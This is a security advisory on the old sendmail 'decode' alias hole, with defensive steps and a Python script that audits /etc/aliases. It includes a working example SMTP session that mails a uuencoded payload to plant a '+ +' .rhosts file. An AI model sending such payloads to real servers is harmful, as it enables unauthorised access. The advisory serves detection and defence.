SMTP mail to decode alias
Summary
An e-mail message has been seen addressed to the user named decode. This might be an attempt to break into the e-mail server, or it might be part of a scan against the system.
Details
This is a fairly old issue originally discovered in 1990. UNIX systems would allow e-mail sent to the username decode to be passed not to a user, but to the program uudecode. The intruder could cause files to be overwritten in this manner in order to break into the system.
This bug comes from the default /etc/aliases file containing a line that looks like:
decode: |/usr/bin/uudecode
These days, this intrusion will likely only be triggered by broad-spectrum vulnerability scanners as they examine your system.
Example Exploit
The intruder will attempt to e-mail a uuencoded file after the DATA command.

HELO
MAIL FROM: test@example.com
RCPT TO: decode
DATA
begin 644 /usr/bin/.rhosts
$*R`K"@``
`
end
.
QUIT

This example will exploit the system by writing the line "+ +" to the file ".rhosts". This will tell the system to trust anybody who logs in via such programs as 'rlogin'.
Systems
This alert is only important for sendmail servers running on UNIX.
Defense
Look in the e-mail "aliases" file located in /etc/aliases. Look for lines that look like:

decode: |/usr/bin/uudecode
uudecode: |/usr/bin/uuencode -d

Remove these lines.

Note that newer systems do not have this enabled.
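
The check described under Defense can be scripted. The following is an added example, not part of the original advisory: it parses aliases-file text, skips commented-out lines, joins indented continuation lines, and reports every alias that pipes mail to a program. The sample file, the function names and the "review" verdict for piped programs other than the two shown above are assumptions of this example.

```python
import re

# Constructed sample aliases file (not from a real host).
SAMPLE_ALIASES = '''\
postmaster: root
decode: |/usr/bin/uudecode
uudecode: "|/usr/bin/uuencode -d"
support: alice,
    bob, "|/usr/local/bin/ticket --queue support"
#decode: |/usr/bin/uudecode
'''

# Programs in the lines the page says to remove; "review" for other pipes is this example's policy.
FLAGGED_PROGRAMS = {"uudecode", "uuencode"}


def logical_lines(text):
    """Return [first_line_number, entry] pairs: comments skipped, continuations joined."""
    entries = []
    for num, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        if raw[0] in " \t" and entries:
            entries[-1][1] += " " + raw.strip()  # indented line continues the alias
        else:
            entries.append([num, raw.strip()])
    return entries


def audit_aliases(text):
    """Return (line, alias, command, verdict) for each target that pipes mail to a program."""
    findings = []
    for num, entry in logical_lines(text):
        name, _, targets = entry.partition(":")
        # Each target is a quoted string or a run of characters up to the next comma.
        for target in re.findall(r'\s*("[^"]*"|[^,]+)', targets):
            target = target.strip().strip('"').strip()
            if target.startswith("|"):
                command = target[1:].strip().strip('"')
                program = command.split()[0].rsplit("/", 1)[-1] if command else ""
                verdict = "remove" if program in FLAGGED_PROGRAMS else "review"
                findings.append((num, name.strip(), command, verdict))
    return findings


if __name__ == "__main__":
    for finding in audit_aliases(SAMPLE_ALIASES):
        print("line %d: alias %r pipes to %r (%s)" % finding)
```

To check a real host, pass the contents of /etc/aliases to audit_aliases() instead of the sample text.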